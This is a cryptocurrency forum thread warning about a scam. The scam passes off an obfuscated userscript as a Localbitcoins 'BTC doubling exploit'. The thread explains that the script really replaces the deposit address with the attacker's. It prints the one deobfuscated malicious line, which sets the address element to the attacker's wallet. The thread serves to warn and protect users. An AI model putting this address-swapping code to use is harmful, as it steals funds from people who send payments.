Title: Fake "Localbitcoin doubling BTC exploit script" scam Post by: TryNinja on November 16, 2019, 12:30:12 AM I'm creating this thread to warn people about this scam, which I have seen multiple times in the forum, and to serve as a reference link for a type 1 flag on the user (and future ones).
Archive of his (locked) thread: https://archive.is/flfGm User in question (will update if others show up): Tempates134 (https://bitcointalk.org/index.php?action=profile;u=2715861) (flag (https://bitcointalk.org/index.php?action=trust;flag=985)) Small description about the scam: The user will post the link to a PDF teaching how to use a Localbitcoin exploit (P.S: There are variations of this scam where the user uses G2A or Bitpay) with a encoded/obfuscated JS script. Here (https://anonymousfiles.io/cJUhTJdQ/) is the PDF. And this is how the script looks like (changed a few parts of it to avoid people running it by mistake): Code: // ==UserScript== It supposedly changes the timezone of the website or do other stuff (varies a lot) to make you receive your coins doubled, or receive a product you purchased (when it's about G2A or Bitpay) along with a refund. But all the script does is change the BTC deposit address on these websites to one owned by the hacker. You will send the coins thinking you are sending to the real address, to then use the exploit, but nothing will ever happen. You can partially deobfuscate the code on https://lelinhtinh.github.io/de4js/ and see that it changes the address on Localbitcoin to "1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos": Code: document[_1x0beb('0x0')]('bitcoin-address bitcoin-address-controls')[0x0]['innerHTML'] = '1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos'; Please NEVER trust any of these random scripts, specially if it's an encoded/obfuscated JS script (as shown above). You can't know what it does, and 99% of the time it does something it shouldn't. Stay safe. Title: Re: Fake "Localbitcoin doubling BTC exploit script" scam Post by: DaveF on November 16, 2019, 01:50:52 AM It's a virus:
https://www.virustotal.com/gui/url/2ba37ee91c7b05de45f1badb57a6ccd4d6a5a146920746d6590e561cf1653394/detection I posted about it here: https://bitcointalk.org/index.php?topic=5182222.msg53088599#msg53088599 -Dave Title: Re: Fake "Localbitcoin doubling BTC exploit script" scam Post by: Patatas on November 16, 2019, 12:09:11 PM Good catch! I wonder how changing the timezone can even be done by a JS script, that's totally handled on the server-side. So basically what the script does is changes the bitcoin address through DOM manipulation. I think as part of security on LBC's end, they should either ask to confirm the address on the next page before sending a transaction or force everyone to use 2FA.
|